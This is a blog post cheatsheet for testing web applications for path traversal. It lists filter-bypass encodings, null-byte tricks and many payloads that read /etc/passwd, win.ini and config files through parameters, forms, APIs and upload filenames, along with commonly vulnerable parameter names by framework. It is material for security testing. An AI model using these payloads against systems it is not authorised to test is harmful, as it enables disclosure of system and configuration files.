Path Traversal Vulnerabilities: Cheatsheet

Posted Nov 15, 2024 Updated Dec 13, 2025

By Shervoni

3 min read

When testing for path traversal vulnerabilities, look for every potential entry points.

Path Traversal Testing Cheatsheet

Check for endpoints with file operations (e.g., load, file, path, image, download).
Test common file parameters like file=, path=, dir=, image=.
Modify URL paths to include traversal sequences (e.g., ../, ..\, ../../file.txt).
Test static resources or templates (e.g., ?template=header.html).
Use URL encoding (%2e%2e%2f) and double encoding (%252e%252e%252f).
Test non-standard encodings like ....// or ....\/.
Inject null bytes to bypass extensions (e.g., ../../file.txt%00.jpg).
Add traversal sequences after valid paths (e.g., /assets/../../../etc/passwd).
Check for traversal in APIs (e.g., POST /api/file {"path": "../../../etc/passwd"}).
Explore file upload features for path manipulation.
Identify OS type by testing payloads (/etc/passwd for Linux, windows\win.ini for Windows).
Look for error messages revealing filesystem structure.
Inspect headers like Content-Type or responses for sensitive file data.
Observe HTTP status codes or response sizes for anomalies.
Combine traversal with query strings or fragments (e.g., ?file=../../../etc/passwd#).
Try traversal with absolute paths (/etc/passwd) if relative paths are blocked.
Search for traversal in multi-part forms (filename="../../config.php").
Test traversal in directory browsing endpoints.
Inject traversal into parameters not directly related to files (e.g., id=../config).
Monitor how inputs are sanitized or normalized by the application.

Identify Entry Points

Common Input Parameters:
- Additional Parameters:
  - resource, filename, location, target, filePath, upload, media, config, data, log
- Example:
  1 https://example.com/download?file=../../etc/passwd
URL Paths:
- Testing with Different Encodings:
  - Use URL encoding or double URL encoding to bypass filters.
- Example:
  1 https://example.com/resources/%2E%2E/%2E%2E/etc/passwd
Form Inputs:
- Manipulating Hidden Fields:
  - Check for hidden fields in forms that might accept file paths.
- Example:
  1 <input type="hidden" name="file" value="../../etc/passwd">
API Endpoints:
- Testing with Different HTTP Methods:
  - Use methods like PUT or PATCH if supported, as they may allow file uploads or modifications.
- Example:
  1 2 PUT /api/upload { "file": "../../etc/passwd" }

Additional Techniques

Directory Listing:
- Check for Directory Listing:
  - If directory listing is enabled, you can view files and directories, which can provide insight into potential targets.
- Example:
  1 https://example.com/uploads/
File Inclusion Vulnerabilities:
- Test for Local File Inclusion (LFI):
  - Use parameters that may inadvertently include files.
- Example:
  1 https://example.com/view?file=../../../../etc/passwd
Error Messages:
- Analyze Error Responses:
  - Pay attention to error messages that might disclose file paths or system information.
- Example:
  1 "File not found: /var/www/html/../../etc/passwd"
Log Files:
- Access Log Files:
  - If you have access to logs, check for any logged paths that might indicate vulnerability.
- Example:
  1 /var/log/apache2/access.log
Environment Variables:
- Check for Environment Variable Exposure:
  - Some applications may expose sensitive paths through environment variables.
- Example:
  1 https://example.com/config?env=PATH
File Uploads:
- Testing File Uploads:
  - Attempt to upload files with path traversal characters in the filename.
- Example:
  1 2 POST /upload Content-Disposition: form-data; name="file"; filename="../../../../etc/passwd"

Some Examples Of Path Traversal Vulnerable Parameters by Language

PHP

file: /loadFile.php?file=
image: /imageLoader.php?image=
doc: /document.php?doc=
path: /getPath.php?path=
template: /template.php?template=
script: /script.php?script=
config: /config.php?file=
log: /logs.php?file=

Python (Flask)

filename: /download?filename=
path: /file?path=
resource: /api/resource?resource=
template: /render?template=
config: /config?file=
image: /image/view?image=
data: /data?file=
report: /report?file=

Node.js (Express)

file: /getFile?file=
image: /images?src=
path: /read?path=
template: /render?template=
config: /config?file=
media: /media?file=
log: /logs?file=
data: /data?file=

Ruby on Rails

file: /files/show?file=
asset: /assets/load?name=
path: /api/path?file=
template: /template/show?name=
report: /reports/view?file=
image: /images/view?src=
config: /config/load?file=
log: /logs/view?file=

Java (Spring)

file: /download?file=
image: /image/view?file=
resource: /resource/load?name=
path: /api/path?file=
template: /template/render?name=
config: /config/load?file=
log: /logs/view?file=
data: /data/fetch?file=

ASP.NET

file: /FileDownload.aspx?file=
image: /ImageHandler.ashx?src=
path: /GetFile.ashx?path=
template: /TemplateLoader.aspx?name=
report: /ReportViewer.aspx?file=
config: /ConfigLoader.aspx?file=
media: /MediaHandler.ashx?file=
log: /LogViewer.aspx?file=

Go

file: /api/file?file=
image: /image?src=
path: /read?path=
template: /render?template=
config: /config?file=
log: /logs/view?file=
data: /data/fetch?file=
report: /report/view?file=

ColdFusion

file: /fileLoader.cfm?file=
image: /image.cfm?img=
resource: /resource.cfm?res=
path: /path.cfm?path=
template: /template.cfm?name=
log: /logs.cfm?file=
data: /data.cfm?file=
report: /report.cfm?file=

Perl

file: /file.pl?file=
image: /image.pl?src=
path: /path.pl?path=
template: /template.pl?name=
report: /report.pl?file=
config: /config.pl?file=
log: /logs.pl?file=
data: /data.pl?file=

ASP Classic

file: /file.asp?file=
image: /image.asp?img=
path: /path.asp?path=
template: /template.asp?name=
report: /report.asp?file=
config: /config.asp?file=
log: /logs.asp?file=
data: /data.asp?file=

Cheatsheets

Cheatsheet

This post is licensed under CC BY 4.0 by the author.